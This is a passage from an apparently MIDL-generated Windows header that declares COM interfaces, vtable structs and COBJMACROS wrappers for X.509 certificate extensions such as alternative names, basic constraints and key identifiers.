        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IAlternativeNames *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternativeNames( 
            /* [retval][out] */ __RPC__deref_out_opt IAlternativeNames **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionAlternativeNamesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionAlternativeNames * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionAlternativeNames * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionAlternativeNames * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ __RPC__in_opt IAlternativeNames *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternativeNames )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [retval][out] */ __RPC__deref_out_opt IAlternativeNames **ppValue);
        
        END_INTERFACE
    } IX509ExtensionAlternativeNamesVtbl;

    interface IX509ExtensionAlternativeNames
    {
        CONST_VTBL struct IX509ExtensionAlternativeNamesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionAlternativeNames_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionAlternativeNames_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionAlternativeNames_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionAlternativeNames_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionAlternativeNames_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionAlternativeNames_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionAlternativeNames_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionAlternativeNames_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionAlternativeNames_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionAlternativeNames_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionAlternativeNames_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionAlternativeNames_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionAlternativeNames_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionAlternativeNames_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionAlternativeNames_get_AlternativeNames(This,ppValue)	\
    ( (This)->lpVtbl -> get_AlternativeNames(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionAlternativeNames_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionBasicConstraints_INTERFACE_DEFINED__
#define __IX509ExtensionBasicConstraints_INTERFACE_DEFINED__

/* interface IX509ExtensionBasicConstraints */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionBasicConstraints;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab316-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionBasicConstraints : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ VARIANT_BOOL IsCA,
            /* [in] */ LONG PathLenConstraint) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsCA( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PathLenConstraint( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionBasicConstraintsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionBasicConstraints * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionBasicConstraints * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionBasicConstraints * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ VARIANT_BOOL IsCA,
            /* [in] */ LONG PathLenConstraint);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsCA )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PathLenConstraint )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        END_INTERFACE
    } IX509ExtensionBasicConstraintsVtbl;

    interface IX509ExtensionBasicConstraints
    {
        CONST_VTBL struct IX509ExtensionBasicConstraintsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionBasicConstraints_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionBasicConstraints_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionBasicConstraints_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionBasicConstraints_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionBasicConstraints_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionBasicConstraints_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionBasicConstraints_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionBasicConstraints_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionBasicConstraints_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionBasicConstraints_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionBasicConstraints_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionBasicConstraints_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionBasicConstraints_InitializeEncode(This,IsCA,PathLenConstraint)	\
    ( (This)->lpVtbl -> InitializeEncode(This,IsCA,PathLenConstraint) ) 

#define IX509ExtensionBasicConstraints_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionBasicConstraints_get_IsCA(This,pValue)	\
    ( (This)->lpVtbl -> get_IsCA(This,pValue) ) 

#define IX509ExtensionBasicConstraints_get_PathLenConstraint(This,pValue)	\
    ( (This)->lpVtbl -> get_PathLenConstraint(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionBasicConstraints_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionSubjectKeyIdentifier_INTERFACE_DEFINED__
#define __IX509ExtensionSubjectKeyIdentifier_INTERFACE_DEFINED__

/* interface IX509ExtensionSubjectKeyIdentifier */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionSubjectKeyIdentifier;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab317-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionSubjectKeyIdentifier : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strKeyIdentifier) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SubjectKeyIdentifier( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionSubjectKeyIdentifierVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionSubjectKeyIdentifier * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strKeyIdentifier);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SubjectKeyIdentifier )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509ExtensionSubjectKeyIdentifierVtbl;

    interface IX509ExtensionSubjectKeyIdentifier
    {
        CONST_VTBL struct IX509ExtensionSubjectKeyIdentifierVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionSubjectKeyIdentifier_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionSubjectKeyIdentifier_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionSubjectKeyIdentifier_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionSubjectKeyIdentifier_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionSubjectKeyIdentifier_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionSubjectKeyIdentifier_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionSubjectKeyIdentifier_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionSubjectKeyIdentifier_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionSubjectKeyIdentifier_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionSubjectKeyIdentifier_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionSubjectKeyIdentifier_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionSubjectKeyIdentifier_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionSubjectKeyIdentifier_InitializeEncode(This,Encoding,strKeyIdentifier)	\
    ( (This)->lpVtbl -> InitializeEncode(This,Encoding,strKeyIdentifier) ) 

#define IX509ExtensionSubjectKeyIdentifier_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionSubjectKeyIdentifier_get_SubjectKeyIdentifier(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SubjectKeyIdentifier(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionSubjectKeyIdentifier_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionAuthorityKeyIdentifier_INTERFACE_DEFINED__
#define __IX509ExtensionAuthorityKeyIdentifier_INTERFACE_DEFINED__

/* interface IX509ExtensionAuthorityKeyIdentifier */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionAuthorityKeyIdentifier;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab318-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionAuthorityKeyIdentifier : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strKeyIdentifier) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AuthorityKeyIdentifier( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionAuthorityKeyIdentifierVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionAuthorityKeyIdentifier * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strKeyIdentifier);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AuthorityKeyIdentifier )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509ExtensionAuthorityKeyIdentifierVtbl;

    interface IX509ExtensionAuthorityKeyIdentifier
    {
        CONST_VTBL struct IX509ExtensionAuthorityKeyIdentifierVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionAuthorityKeyIdentifier_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionAuthorityKeyIdentifier_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionAuthorityKeyIdentifier_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionAuthorityKeyIdentifier_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionAuthorityKeyIdentifier_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionAuthorityKeyIdentifier_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionAuthorityKeyIdentifier_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
